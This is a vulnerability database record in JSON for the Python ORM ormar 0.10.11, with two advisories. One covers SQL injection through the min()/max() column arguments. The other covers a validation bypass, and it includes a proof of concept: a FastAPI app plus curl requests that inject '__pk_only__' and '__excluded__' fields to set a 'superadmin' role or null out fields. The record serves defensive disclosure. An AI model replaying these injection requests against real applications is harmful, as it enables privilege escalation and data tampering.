{"url":"http://public2.vulnerablecode.io/api/packages/968725?format=json","purl":"pkg:pypi/ormar@0.10.11","type":"pypi","namespace":"","name":"ormar","version":"0.10.11","qualifiers":{},"subpath":"","is_vulnerable":true,"next_non_vulnerable_version":"0.23.1","latest_non_vulnerable_version":"0.23.1","affected_by_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50306?format=json","vulnerability_id":"VCID-fhxs-bfbq-vbbp","summary":"ormar is vulnerable to SQL Injection through aggregate functions min() and max()\n# Report of SQL Injection Vulnerability in Ormar ORM\n\n## A SQL Injection attack can be achieved by passing a crafted string to the min() or max() aggregate functions.\n\n## Brief description\n\nWhen performing aggregate queries, Ormar ORM constructs SQL expressions by passing user-supplied column names directly into `sqlalchemy.text()` without any validation or sanitization. The `min()` and `max()` methods in the `QuerySet` class accept arbitrary string input as the column parameter. While `sum()` and `avg()` are partially protected by an `is_numeric` type check that rejects non-existent fields, `min()` and `max()` skip this validation entirely. As a result, an attacker-controlled string is embedded as raw SQL inside the aggregate function call. Any unauthorized user can exploit this vulnerability to read the entire database contents, including tables unrelated to the queried model, by injecting a subquery as the column parameter.\n\n## Affected versions\n\n```\n0.9.9 - 0.12.2\n0.20.0b1 - 0.22.0 (latest)\n```\n\nThe vulnerable `SelectAction.get_text_clause()` method and the `min()`/`max()` aggregate functions were introduced together in commit `ff9d412` (March 12, 2021) and first released in version **0.9.9**. The vulnerable code has never been modified since — `get_text_clause()` is identical in every subsequent version through the latest **0.21.0**.\n\nVersions prior to 0.9.9 do not contain the `min()`/`max()` aggregate feature and are not affected.\n\nThe following uses the latest ormar 0.21.0 as an example to illustrate the attack.\n\n## Vulnerability details\n\nWhen performing an aggregate query, the `QuerySet.max()` method (line 721, `queryset.py`) passes user input to `_query_aggr_function()`. This method creates a `SelectAction` object for each column name. The column string is split by `__` and the last part becomes `self.field_name` — with no validation against the model's actual fields.\n\nThe critical vulnerability is in `SelectAction.get_text_clause()` (line 41-43, `select_action.py`), which directly passes `self.field_name` into `sqlalchemy.text()`:\n\n```python\n#select_action.py line 41-43\ndef get_text_clause(self) -> sqlalchemy.sql.expression.TextClause:\n alias = f\"{self.table_prefix}_\" if self.table_prefix else \"\"\n return sqlalchemy.text(f\"{alias}{self.field_name}\") # unsanitised user input!\n```\n\nThe `apply_func()` method then wraps this raw text clause inside `func.max()`, producing SQL like `max()`. Since `sqlalchemy.text()` treats its argument as literal SQL, any subquery or SQL expression injected through the column name will be executed by the database engine.\n\nThe `_query_aggr_function()` method (line 704-719, `queryset.py`) only validates field types for `sum` and `avg`, leaving `min` and `max` completely unprotected:\n\n```python\n#queryset.py line 704-719\nasync def _query_aggr_function(self, func_name: str, columns: List) -> Any:\n func = getattr(sqlalchemy.func, func_name)\n select_actions = [\n SelectAction(select_str=column, model_cls=self.model) for column in columns\n ]\n if func_name in [\"sum\", \"avg\"]: # <-- only sum/avg are checked!\n if any(not x.is_numeric for x in select_actions):\n raise QueryDefinitionError(...)\n select_columns = [x.apply_func(func, use_label=True) for x in select_actions]\n expr = self.build_select_expression().alias(f\"subquery_for_{func_name}\")\n expr = sqlalchemy.select(*select_columns).select_from(expr)\n result = await self.database.fetch_one(expr)\n return dict(result) if len(result) > 1 else result[0]\n```\n\nTo reproduce the attack, you can follow the steps below, using a FastAPI application with SQLite as an example.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-26198","reference_id":"","reference_type":"","scores":[{"value":"0.00024","scoring_system":"epss","scoring_elements":"0.0693","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00024","scoring_system":"epss","scoring_elements":"0.06885","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00024","scoring_system":"epss","scoring_elements":"0.06878","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00024","scoring_system":"epss","scoring_elements":"0.06915","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00024","scoring_system":"epss","scoring_elements":"0.06925","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-26198"},{"reference_url":"https://github.com/collerek/ormar","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/collerek/ormar"},{"reference_url":"https://github.com/collerek/ormar/commit/a03bae14fe01358d3eaf7e319fcd5db2e4956b16","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-02-24T20:29:06Z/"}],"url":"https://github.com/collerek/ormar/commit/a03bae14fe01358d3eaf7e319fcd5db2e4956b16"},{"reference_url":"https://github.com/collerek/ormar/releases/tag/0.23.0","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-02-24T20:29:06Z/"}],"url":"https://github.com/collerek/ormar/releases/tag/0.23.0"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1129259","reference_id":"1129259","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1129259"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-26198","reference_id":"CVE-2026-26198","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-26198"},{"reference_url":"https://github.com/advisories/GHSA-xxh2-68g9-8jqr","reference_id":"GHSA-xxh2-68g9-8jqr","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-xxh2-68g9-8jqr"},{"reference_url":"https://github.com/collerek/ormar/security/advisories/GHSA-xxh2-68g9-8jqr","reference_id":"GHSA-xxh2-68g9-8jqr","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-02-24T20:29:06Z/"}],"url":"https://github.com/collerek/ormar/security/advisories/GHSA-xxh2-68g9-8jqr"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74204?format=json","purl":"pkg:pypi/ormar@0.23.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-ykh5-vgdj-k3gt"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/ormar@0.23.0"}],"aliases":["CVE-2026-26198","GHSA-xxh2-68g9-8jqr"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-fhxs-bfbq-vbbp"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91811?format=json","vulnerability_id":"VCID-ykh5-vgdj-k3gt","summary":"ormar Pydantic Validation Bypass via __pk_only__ and __excluded__ Kwargs Injection in Model Constructor\n### Summary\n\nA Pydantic validation bypass in `ormar`'s model constructor allows any unauthenticated user to skip **all** field validation — type checks, constraints, `@field_validator`/`@model_validator` decorators, choices enforcement, and required-field checks — by injecting `\"__pk_only__\": true` into a JSON request body. The unvalidated data is subsequently persisted to the database. This affects the **canonical usage pattern** recommended in ormar's official documentation and examples.\n\nA secondary `__excluded__` parameter injection uses the same design pattern to selectively nullify arbitrary model fields during construction.\n\n### Details\n\n**Root cause:** `NewBaseModel.__init__` ([`ormar/models/newbasemodel.py`, line 128](https://github.com/collerek/ormar/blob/master/ormar/models/newbasemodel.py#L128)) pops `__pk_only__` directly from user-supplied `**kwargs` before any validation occurs:\n\n```python\n# ormar/models/newbasemodel.py, lines 128-142\npk_only = kwargs.pop(\"__pk_only__\", False) # ← extracted from user kwargs\nobject.__setattr__(self, \"__pk_only__\", pk_only)\n\nnew_kwargs, through_tmp_dict = self._process_kwargs(kwargs)\n\nif not pk_only:\n # Normal path: full Pydantic validation\n new_kwargs = self.serialize_nested_models_json_fields(new_kwargs)\n self.__pydantic_validator__.validate_python(\n new_kwargs, self_instance=self\n )\nelse:\n # Bypass path: NO validation at all\n fields_set = {self.ormar_config.pkname}\n values = new_kwargs\n object.__setattr__(self, \"__dict__\", values) # raw dict written directly\n object.__setattr__(self, \"__pydantic_fields_set__\", fields_set)\n```\n\nThe `__pk_only__` flag was designed as an internal optimization for creating lightweight FK placeholder instances in [`ormar/fields/foreign_key.py` (lines 41, 527)](https://github.com/collerek/ormar/blob/master/ormar/fields/foreign_key.py#L41). However, because it is extracted from `**kwargs` via `.pop()` with a `False` default, any external caller that passes user-controlled data to the model constructor can inject this flag.\n\n**Why the canonical FastAPI + ormar pattern is vulnerable:**\n\nOrmar's official example ([`examples/fastapi_quick_start.py`, lines 55-58](https://github.com/collerek/ormar/blob/master/examples/fastapi_quick_start.py#L55)) recommends using ormar models directly as FastAPI request body parameters:\n\n```python\n@app.post(\"/items/\", response_model=Item)\nasync def create_item(item: Item):\n await item.save()\n return item\n```\n\nFastAPI parses the JSON body and calls `TypeAdapter.validate_python(body_dict)`, which triggers ormar's `__init__`. The `__pk_only__` key is popped at line 128 **before** Pydantic's validator inspects the data, so Pydantic never sees it — even `extra='forbid'` would not prevent this, because the key is already consumed by ormar.\n\nThe ormar Pydantic `model_config` (set in [`ormar/models/helpers/pydantic.py`, line 108](https://github.com/collerek/ormar/blob/master/ormar/models/helpers/pydantic.py#L108)) does not set `extra='forbid'`, providing no protection even in theory.\n\n**What is bypassed when `__pk_only__=True`:**\n- All type coercion and type checking (e.g., string for int field)\n- `max_length` constraints on String fields\n- `choices` constraints\n- All `@field_validator` and `@model_validator` decorators\n- `nullable=False` enforcement at the Pydantic level\n- Required-field enforcement (only `pkname` is put in `fields_set`)\n- `serialize_nested_models_json_fields()` preprocessing\n\n**Save path persists unvalidated data to the database:**\n\nAfter construction with `pk_only=True`, calling `.save()` ([`ormar/models/model.py`, lines 89-107](https://github.com/collerek/ormar/blob/master/ormar/models/model.py#L89)) reads fields directly from `self.__dict__` via `_extract_model_db_fields()`, then executes `table.insert().values(**self_fields)` — persisting the unvalidated data to the database with no re-validation.\n\n**Secondary vulnerability — `__excluded__` injection:**\n\nThe same pattern applies to `__excluded__` at [`ormar/models/newbasemodel.py`, line 292](https://github.com/collerek/ormar/blob/master/ormar/models/newbasemodel.py#L292):\n\n```python\nexcluded: set[str] = kwargs.pop(\"__excluded__\", set())\n```\n\nAt lines 326-329, fields listed in `__excluded__` are silently set to `None`:\n\n```python\nfor field_to_nullify in excluded:\n new_kwargs[field_to_nullify] = None\n```\n\nAn attacker can inject `\"__excluded__\": [\"email\", \"password_hash\"]` to nullify arbitrary fields during construction.\n\n**Affected entry points:**\n\n| Entry Point | Exploitable? |\n|---|---|\n| `async def create_item(item: Item)` (FastAPI route) | Yes |\n| `Model.objects.create(**user_dict)` | Yes |\n| `Model(**user_dict)` | Yes |\n| `Model.model_validate(user_dict)` | Yes |\n\n### PoC\n\n**Step 1: Create a FastAPI + ormar application using the canonical pattern from ormar's docs:**\n\n```python\n# app.py\nfrom contextlib import asynccontextmanager\nimport sqlalchemy\nimport uvicorn\nfrom fastapi import FastAPI\nimport ormar\n\nDATABASE_URL = \"sqlite+aiosqlite:///test.db\"\normar_base_config = ormar.OrmarConfig(\n database=ormar.DatabaseConnection(DATABASE_URL),\n metadata=sqlalchemy.MetaData(),\n)\n\n@asynccontextmanager\nasync def lifespan(app: FastAPI):\n database_ = app.state.database\n if not database_.is_connected:\n await database_.connect()\n # Create tables\n engine = sqlalchemy.create_engine(DATABASE_URL.replace(\"+aiosqlite\", \"\"))\n ormar_base_config.metadata.create_all(engine)\n engine.dispose()\n yield\n database_ = app.state.database\n if database_.is_connected:\n await database_.disconnect()\n\napp = FastAPI(lifespan=lifespan)\ndatabase = ormar.DatabaseConnection(DATABASE_URL)\napp.state.database = database\n\nclass User(ormar.Model):\n ormar_config = ormar_base_config.copy(tablename=\"users\")\n\n id: int = ormar.Integer(primary_key=True)\n name: str = ormar.String(max_length=50)\n email: str = ormar.String(max_length=100)\n role: str = ormar.String(max_length=20, default=\"user\")\n balance: int = ormar.Integer(default=0)\n\n# Canonical ormar pattern from official examples\n@app.post(\"/users/\", response_model=User)\nasync def create_user(user: User):\n await user.save()\n return user\n\nif __name__ == \"__main__\":\n uvicorn.run(app, host=\"127.0.0.1\", port=8000)\n```\n\n**Step 2: Send a normal request (validation works correctly):**\n\n```bash\n# This correctly rejects — \"name\" exceeds max_length=50\ncurl -X POST http://127.0.0.1:8000/users/ \\\n -H \"Content-Type: application/json\" \\\n -d '{\n \"name\": \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\",\n \"email\": \"user@example.com\"\n }'\n# Returns: 422 Validation Error\n```\n\n**Step 3: Inject `__pk_only__` to bypass ALL validation:**\n\n```bash\ncurl -X POST http://127.0.0.1:8000/users/ \\\n -H \"Content-Type: application/json\" \\\n -d '{\n \"__pk_only__\": true,\n \"name\": \"\",\n \"email\": \"not-an-email\",\n \"role\": \"superadmin\",\n \"balance\": -99999\n }'\n# Returns: 200 OK — all fields persisted to database WITHOUT validation\n# - \"name\" is empty despite being required\n# - \"email\" is not a valid email\n# - \"role\" is \"superadmin\" (bypassing any validator that restricts to \"user\"/\"admin\")\n# - \"balance\" is negative (bypassing any ge=0 constraint)\n```\n\n**Step 4: Inject `__excluded__` to nullify arbitrary fields:**\n\n```bash\ncurl -X POST http://127.0.0.1:8000/users/ \\\n -H \"Content-Type: application/json\" \\\n -d '{\n \"__excluded__\": [\"email\", \"role\"],\n \"name\": \"attacker\",\n \"email\": \"will-be-nullified@example.com\",\n \"role\": \"will-be-nullified\"\n }'\n# Returns: 200 OK — email and role are set to NULL regardless of input\n```\n\n### Impact\n\n**Who is impacted:** Every application using ormar's canonical FastAPI integration pattern (`async def endpoint(item: OrmarModel)`) is vulnerable. This is the primary usage pattern documented in ormar's official examples and documentation.\n\n**Vulnerability type:** Complete Pydantic validation bypass.\n\n**Impact scenarios:**\n- **Privilege escalation**: If a model has a `role` or `is_admin` field with a Pydantic validator restricting values to `\"user\"`, an attacker can set `role=\"superadmin\"` by bypassing the validator\n- **Data integrity violation**: Type constraints (`max_length`, `ge`/`le`, regex patterns) are all bypassed — invalid data is persisted to the database\n- **Business logic bypass**: Custom `@field_validator` and `@model_validator` decorators (e.g., enforcing email format, age ranges, cross-field dependencies) are entirely skipped\n- **Field nullification** (via `__excluded__`): Audit fields, tracking fields, or required business fields can be selectively set to NULL\n\n**Suggested fix:**\n\nReplace `kwargs.pop(\"__pk_only__\", False)` with a keyword-only parameter that cannot be injected via `**kwargs`:\n\n```python\n# Before (vulnerable)\ndef __init__(self, *args: Any, **kwargs: Any) -> None:\n ...\n pk_only = kwargs.pop(\"__pk_only__\", False)\n\n# After (secure)\ndef __init__(self, *args: Any, _pk_only: bool = False, **kwargs: Any) -> None:\n ...\n object.__setattr__(self, \"__pk_only__\", _pk_only)\n```\n\nApply the same fix to `__excluded__`:\n\n```python\n# Before (vulnerable)\nexcluded: set[str] = kwargs.pop(\"__excluded__\", set())\n\n# After (secure) — pass via keyword-only _excluded parameter\ndef __init__(self, *args: Any, _pk_only: bool = False, _excluded: set | None = None, **kwargs: Any) -> None:\n ...\n # In _process_kwargs:\n excludes = _excluded or set()\n```\n\nInternal callers in `foreign_key.py` would pass `_pk_only=True` as a named argument. Keyword-only parameters prefixed with `_` cannot be injected via JSON body deserialization or `Model(**user_dict)` unpacking.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-27953","reference_id":"","reference_type":"","scores":[{"value":"0.00489","scoring_system":"epss","scoring_elements":"0.65898","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00489","scoring_system":"epss","scoring_elements":"0.65903","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00489","scoring_system":"epss","scoring_elements":"0.65884","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00489","scoring_system":"epss","scoring_elements":"0.65895","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00489","scoring_system":"epss","scoring_elements":"0.6591","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-27953"},{"reference_url":"https://github.com/ormar-orm/ormar","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/ormar-orm/ormar"},{"reference_url":"https://github.com/ormar-orm/ormar/blob/master/examples/fastapi_quick_start.py#L55","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-20T17:04:35Z/"}],"url":"https://github.com/ormar-orm/ormar/blob/master/examples/fastapi_quick_start.py#L55"},{"reference_url":"https://github.com/ormar-orm/ormar/blob/master/ormar/fields/foreign_key.py#L41","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-20T17:04:35Z/"}],"url":"https://github.com/ormar-orm/ormar/blob/master/ormar/fields/foreign_key.py#L41"},{"reference_url":"https://github.com/ormar-orm/ormar/blob/master/ormar/models/helpers/pydantic.py#L108","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-20T17:04:35Z/"}],"url":"https://github.com/ormar-orm/ormar/blob/master/ormar/models/helpers/pydantic.py#L108"},{"reference_url":"https://github.com/ormar-orm/ormar/blob/master/ormar/models/model.py#L89","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-20T17:04:35Z/"}],"url":"https://github.com/ormar-orm/ormar/blob/master/ormar/models/model.py#L89"},{"reference_url":"https://github.com/ormar-orm/ormar/blob/master/ormar/models/newbasemodel.py#L128","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-20T17:04:35Z/"}],"url":"https://github.com/ormar-orm/ormar/blob/master/ormar/models/newbasemodel.py#L128"},{"reference_url":"https://github.com/ormar-orm/ormar/blob/master/ormar/models/newbasemodel.py#L292","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-20T17:04:35Z/"}],"url":"https://github.com/ormar-orm/ormar/blob/master/ormar/models/newbasemodel.py#L292"},{"reference_url":"https://github.com/ormar-orm/ormar/commit/7f22aa21a7614b993970345b392dabb0ccde0ab3","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-20T17:04:35Z/"}],"url":"https://github.com/ormar-orm/ormar/commit/7f22aa21a7614b993970345b392dabb0ccde0ab3"},{"reference_url":"https://github.com/ormar-orm/ormar/releases/tag/0.23.1","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-20T17:04:35Z/"}],"url":"https://github.com/ormar-orm/ormar/releases/tag/0.23.1"},{"reference_url":"https://github.com/ormar-orm/ormar/security/advisories/GHSA-f964-whrq-44h8","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-20T17:04:35Z/"}],"url":"https://github.com/ormar-orm/ormar/security/advisories/GHSA-f964-whrq-44h8"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-27953","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-27953"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1131494","reference_id":"1131494","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1131494"},{"reference_url":"https://github.com/advisories/GHSA-f964-whrq-44h8","reference_id":"GHSA-f964-whrq-44h8","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-f964-whrq-44h8"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/114182?format=json","purl":"pkg:pypi/ormar@0.23.1","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/ormar@0.23.1"}],"aliases":["CVE-2026-27953","GHSA-f964-whrq-44h8"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ykh5-vgdj-k3gt"}],"fixing_vulnerabilities":[],"risk_score":"4.5","resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/ormar@0.10.11"}